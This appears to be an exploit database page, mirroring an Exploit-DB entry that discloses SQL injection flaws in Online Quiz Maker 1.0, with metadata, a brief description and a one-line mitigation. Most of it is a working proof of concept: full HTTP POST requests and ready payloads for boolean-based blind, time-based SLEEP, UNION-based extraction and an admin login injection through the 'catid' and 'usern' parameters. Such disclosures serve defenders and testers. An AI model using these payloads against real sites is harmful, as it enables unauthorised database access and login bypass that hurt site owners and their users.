Online Quiz Maker 1.0 - 'catid' SQL Injection

vendor:

Online Quiz Maker

by:

Özkan Mustafa Akkuş (AkkuS)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Online Quiz Maker

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:hscripts:online_quiz_maker

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2018

Online Quiz Maker 1.0 – ‘catid’ SQL Injection

An attacker can execute SQL commands through parameters that contain vulnerable. An authorized user can use the filtering feature and can fully authorize the database or other server informations. Also there are XSS vulnerabilities too.

Mitigation:

Input validation, parameterized queries, and stored procedures should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Online Quiz Maker 1.0 - 'catid' SQL Injection
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.hscripts.com/scripts/php/quiz-maker.php
# Software Link:https://www.hscripts.com/scripts/php/downloads/quiz-maker.zip
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux

# Description : An attacker can execute SQL commands through parameters
# that contain vulnerable.
# An authorized user can use the filtering feature and can fully authorize
# the database or other server informations. Also there are XSS
# vulnerabilities too.

# PoC : SQLi 1 :
# Request(POST):

POST /scripts/php/quiz-system/quiz-system.php HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.hscripts.com/scripts/php/quiz-system/quiz-system.php
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
uname=test&catid=1

# Parameter: catid (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: 

uname=test&catid=1 AND 4815=4815

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 

uname=test&catid=1 AND SLEEP(5)

# Type: UNION query
# Title: Generic UNION query (NULL) - 10 columns
# Payload: 

uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626271,0x56476b436866655067774c6d786b6e434f59566c7541666363786855764c686b5949486e6a4d6b68,0x7178716271),NULL,NULL,NULL--bocR

# PoC : SQLi 2: Admin Login SQL Injection
# Request(POST):

POST /scripts/php/quiz-system/admin/add-category.php HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://server/admin/add-category.php
Cookie: PHPSESSID=k001uia98prmln85spaid6pvq4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
usern=testing&passw=password&type=auth

# Parameter: usern (POST)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 

usern=testing' AND SLEEP(5) AND 'ZECL'='ZECL&passw=password&type=auth